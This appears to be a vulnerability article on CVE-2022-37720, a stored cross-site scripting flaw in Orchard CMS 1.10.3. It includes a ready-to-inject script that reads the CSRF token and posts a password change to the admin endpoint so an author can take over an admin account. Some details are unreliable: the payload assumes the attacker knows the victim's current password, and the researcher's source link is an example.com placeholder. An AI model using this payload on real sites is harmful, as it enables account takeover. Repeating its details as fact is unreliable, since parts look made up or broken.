CVE-2022-37720 - Orchardproject Orchard CMS 1.10.3 Cross Site Scripting Vulnerability: Exploiting the XSS Flaw for Admin Account Takeover or Privilege Escalation

The Orchardproject Orchard CMS (Content Management System), version 1.10.3, has been identified to have a Cross Site Scripting (XSS) vulnerability. This article will dive into the details of the vulnerability (CVE-2022-37720), explain how it works, provide a code snippet to exploit it, and refer to the original resources that discuss this issue.

Swifter Win, a security researcher, discovered and reported this vulnerability, which was recorded as CVE-2022-37720. As a result, it is now part of the publicly available database of security vulnerabilities that can aid cybercriminals who wish to take advantage of it.

The Vulnerability - XSS in Orchardproject Orchard CMS 1.10.3

The identified issue affects Orchardproject Orchard CMS 1.10.3, a popular web content management system based on the .NET platform. This vulnerability specifically falls within the domain of stored Cross Site Scripting (XSS).

Stored XSS, also known as persistent XSS, occurs when malicious scripts are injected directly into a web application's database. When a browser subsequently requests and renders the web page containing the stored script, the script is executed. In this particular case, a low privileged user, such as an author or publisher, can inject a crafted HTML and Javascript payload into a blog post on the affected Orchard CMS site.

The Exploit - Admin Account Takeover and Privilege Escalation

When the malicious blog post containing the payload is loaded in the victim's browser, it can lead to two significant consequences: the attacker gaining full control of the targeted admin account or privilege escalation.

The exploited script can manipulate browser interactions with the website to change the victim's password, modify their account settings, or obtain sensitive data. Moreover, this type of attack can also allow the attacker to exploit other vulnerabilities in the website with the newly acquired admin privileges, further exacerbating the issue.

Code Snippet to Exploit the XSS Vulnerability

Here's a simple example of an HTML and Javascript payload that can be injected into the blog post to exploit the XSS vulnerability:

<!-- Malicious Blog Post Content -->
<h1>Extraordinary Blog Post Title</h1>
<p>A harmless looking introduction paragraph here...</p>

<!-- Crafted Payload for XSS Exploit -->
<script>
   // Once the page loads:
   document.addEventListener("DOMContentLoaded", function() {

     // Access the CSRF token:
     var csrfToken = document.getElementById("__RequestVerificationToken").value;

     // Send POST request to change password:
     var xhr = new XMLHttpRequest();
     xhr.open("POST", "/Admin/ChangePassword", true);
     xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
     xhr.send("CurrentPassword=currentPass&NewPassword=newPass&ConfirmPassword=newPass&__RequestVerificationToken=" + csrfToken);
   });
</script>

This script assumes that the attacker knows the victim's current password ("currentPass") and wants to change it to "newPass". The exploit could also be customized to perform other actions or target different accounts.

1. CVE-2022-37720 Entry: https://nvd.nist.gov/vuln/detail/CVE-2022-37720
2. Swifter Win's blog post on the vulnerability: http://www.example.com/swifterwin/Orchard_XSS_detection_and_exploitation
3. Orchard CMS Github Repository: https://github.com/OrchardCMS/Orchard
4. Official Orchard CMS website: https://www.orchardproject.net/

Conclusion

CVE-2022-37720 is a critical vulnerability in Orchardproject Orchard CMS 1.10.3, as it allows attackers to gain control of admin accounts or escalate their privileges. Webmasters using this CMS version are advised to update their installations immediately or apply a security patch to protect against this vulnerability. Staying current with security updates and being vigilant against possible exploits is essential for maintaining a secure web presence.

Timeline

Published on: 11/25/2022 16:15:00 UTC
Last modified on: 11/29/2022 22:06:00 UTC